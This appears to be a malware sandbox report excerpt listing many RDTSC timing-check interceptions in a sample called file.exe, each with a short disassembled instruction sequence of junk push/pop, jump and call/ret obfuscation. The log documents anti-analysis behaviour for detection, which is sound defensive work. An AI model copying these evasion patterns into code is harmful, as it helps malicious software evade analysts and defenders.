                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3FEE second address: 5F3FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3FF2 second address: 5F3FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F606B second address: 5F607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F865D1C5546h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F865D1C5546h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F71EE second address: 5F71F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6260 second address: 5F6265 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6265 second address: 5F6288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F865CD192E9h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F94F1 second address: 5F94F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F94F7 second address: 5F94FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F832E second address: 5F8332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8332 second address: 5F8338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8338 second address: 5F8361 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F865D1C554Ch 0x00000008 jnl 00007F865D1C5546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push edi 0x00000013 jmp 00007F865D1C5550h 0x00000018 pop edi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB4BE second address: 5FB4E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F865CD192E2h 0x00000008 ja 00007F865CD192D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC439 second address: 5FC43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC43D second address: 5FC443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC443 second address: 5FC449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC449 second address: 5FC463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F865CD192DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD4E2 second address: 5FD4E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD4E6 second address: 5FD56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F865CD192D8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F865CD192D8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 jns 00007F865CD192D9h 0x00000046 or dword ptr [ebp+122D2EEAh], ecx 0x0000004c call 00007F865CD192E6h 0x00000051 mov di, E363h 0x00000055 pop edi 0x00000056 push 00000000h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c jne 00007F865CD192D6h 0x00000062 pop eax 0x00000063 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE62C second address: 5FE682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D283Ch] 0x0000000d jmp 00007F865D1C5552h 0x00000012 push 00000000h 0x00000014 mov ebx, dword ptr [ebp+12480C46h] 0x0000001a mov edi, 36A24E91h 0x0000001f push 00000000h 0x00000021 mov ebx, dword ptr [ebp+122D2CD6h] 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 pushad 0x0000002a jmp 00007F865D1C5559h 0x0000002f push esi 0x00000030 pop esi 0x00000031 popad 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE682 second address: 5FE6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F865CD192E3h 0x0000000f pop edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FE6A0 second address: 5FE6A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FA669 second address: 5FA66E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD6F6 second address: 5FD72C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F865D1C5554h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 ja 00007F865D1C5546h 0x00000016 jmp 00007F865D1C5550h 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD72C second address: 5FD732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6006D6 second address: 6006F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F865D1C5546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F865D1C5557h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD810 second address: 5FD816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6006F7 second address: 600701 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F865D1C554Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600D66 second address: 600D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602F63 second address: 602F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F865D1C5546h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3548 second address: 5A3553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3553 second address: 5A355F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F865D1C5546h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A355F second address: 5A3584 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3584 second address: 5A3588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3588 second address: 5A358E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A358E second address: 5A3594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3594 second address: 5A35A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DDh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A35A6 second address: 5A35AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B47C second address: 60B490 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jl 00007F865CD192D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F865CD192D8h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B490 second address: 60B497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FD17 second address: 60FD28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DDh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617234 second address: 617244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F865D1C5546h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616639 second address: 61663D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61663D second address: 61664D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F865D1C5546h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61664D second address: 616659 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616659 second address: 61665E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61665E second address: 616666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616801 second address: 616805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616805 second address: 61680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61680B second address: 616811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616811 second address: 616825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 js 00007F865CD192D6h 0x0000000b pop eax 0x0000000c ja 00007F865CD192DEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616D72 second address: 616D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865D1C5556h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616D8C second address: 616D96 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170C0 second address: 6170C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170C6 second address: 6170CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170CC second address: 6170DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Dh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B83A second address: 61B860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F865CD192E2h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B860 second address: 61B877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C5553h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C67A second address: 61C689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192DBh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C689 second address: 61C6A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F865D1C554Eh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620FB3 second address: 620FC8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007F865CD192D6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push edx 0x0000000d jno 00007F865CD192D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621507 second address: 62150C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621686 second address: 6216EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F865CD192E2h 0x0000000f jl 00007F865CD192D6h 0x00000015 je 00007F865CD192D6h 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e jng 00007F865CD192D6h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jp 00007F865CD192D6h 0x0000002c jnp 00007F865CD192D6h 0x00000032 popad 0x00000033 jmp 00007F865CD192E7h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F865CD192DFh 0x0000003f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62182C second address: 621832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621832 second address: 621863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F865CD192E9h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007F865CD192D6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F865CD192D6h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF194 second address: 5CF198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF198 second address: 5CF1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF1A3 second address: 5CF1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F865D1C5559h 0x0000000c popad 0x0000000d jne 00007F865D1C555Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 je 00007F865D1C5546h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF1D4 second address: 5CF1DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A505A second address: 5A506B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnp 00007F865D1C5552h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A506B second address: 5A5071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5071 second address: 5A5075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5075 second address: 5A5080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F865CD192D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5080 second address: 5A5093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jp 00007F865D1C5546h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5093 second address: 5A5097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5097 second address: 5A509F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A509F second address: 5A50A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F865CD192D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A50A9 second address: 5A50AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620C64 second address: 620C71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F865CD192D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626040 second address: 626049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626049 second address: 626069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192DCh 0x00000009 popad 0x0000000a pushad 0x0000000b jc 00007F865CD192D6h 0x00000011 jp 00007F865CD192D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626069 second address: 62607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F865D1C5548h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62607E second address: 626093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F865CD192DBh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626093 second address: 6260A1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F865D1C5546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6260A1 second address: 6260A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6260A5 second address: 6260AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EED3E second address: 5EED7E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F865CD192D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+12480C46h], ecx 0x00000013 lea eax, dword ptr [ebp+12493B00h] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F865CD192D8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov dx, cx 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EED7E second address: 5EED82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EED82 second address: 5CE665 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F865CD192E7h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F865CD192D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D2D25h], edx 0x0000002f jl 00007F865CD192D7h 0x00000035 push edx 0x00000036 mov di, 131Ah 0x0000003a pop edx 0x0000003b call dword ptr [ebp+122D2E53h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEE5E second address: 5EEE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EEE62 second address: 5EEE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F865CD192E6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF1E2 second address: 5EF1EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F865D1C5546h 0x0000000a rdtsc
